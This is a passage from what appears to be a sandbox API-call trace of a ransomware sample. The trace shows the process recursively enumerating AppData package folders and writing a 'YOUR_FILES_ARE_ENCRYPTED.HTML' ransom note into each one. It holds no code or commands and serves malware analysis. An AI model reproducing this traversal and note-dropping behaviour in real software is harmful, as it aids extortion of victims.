pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0121.707] GetProcessHeap () returned 0x600000 [0121.707] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.708] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.709] CloseHandle (hObject=0x31c) returned 1 [0121.709] GetProcessHeap () returned 0x600000 [0121.709] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.709] GetProcessHeap () returned 0x600000 [0121.709] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.709] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0121.709] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.709] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData") returned 106 [0121.709] GetProcessHeap () returned 0x600000 [0121.709] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.709] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData" [0121.709] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\*" [0121.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.709] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.709] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0121.709] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.709] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0121.709] GetProcessHeap () returned 0x600000 [0121.709] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.710] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.733] CloseHandle (hObject=0x31c) returned 1 [0121.733] GetProcessHeap () returned 0x600000 [0121.733] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.733] GetProcessHeap () returned 0x600000 [0121.733] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.733] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0121.733] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.733] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState") returned 102 [0121.733] GetProcessHeap () returned 0x600000 [0121.733] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.733] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState" [0121.733] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\*" [0121.733] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.734] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.734] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0121.734] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.734] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0121.734] GetProcessHeap () returned 0x600000 [0121.734] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.735] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.736] CloseHandle (hObject=0x31c) returned 1 [0121.736] GetProcessHeap () returned 0x600000 [0121.736] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.736] GetProcessHeap () returned 0x600000 [0121.736] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.736] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0121.736] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0121.736] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0121.736] GetProcessHeap () returned 0x600000 [0121.736] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.740] WriteFile (in: hFile=0x214, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.742] CloseHandle (hObject=0x214) returned 1 [0121.742] GetProcessHeap () returned 0x600000 [0121.742] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.742] GetProcessHeap () returned 0x600000 [0121.742] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.743] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Windows.MiracastView_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.MIR")) returned 1 [0121.743] StrStrIW (lpFirst="Windows.MiracastView_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.743] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy") returned 83 [0121.743] GetProcessHeap () returned 0x600000 [0121.743] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.744] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy" [0121.744] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\*" [0121.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.746] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.746] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0121.746] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.746] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC") returned 86 [0121.746] GetProcessHeap () returned 0x600000 [0121.746] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.747] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC" [0121.747] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\*" [0121.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.747] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 1 [0121.747] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 0 [0121.747] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0121.747] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0121.747] GetProcessHeap () returned 0x600000 [0121.747] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.749] WriteFile (in: hFile=0x31c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.750] CloseHandle (hObject=0x31c) returned 1 [0121.750] GetProcessHeap () returned 0x600000 [0121.750] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.750] GetProcessHeap () returned 0x600000 [0121.750] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.750] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0121.750] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.750] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData") returned 91 [0121.750] GetProcessHeap () returned 0x600000 [0121.750] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.750] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData" [0121.750] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\*" [0121.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0121.751] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f847eb6, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9f847eb6, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9f847eb6, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188068, dwReserved1=0x3187fc0, cFileName="..", cAlternateFileName="")) returned 1 [0121.751] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: 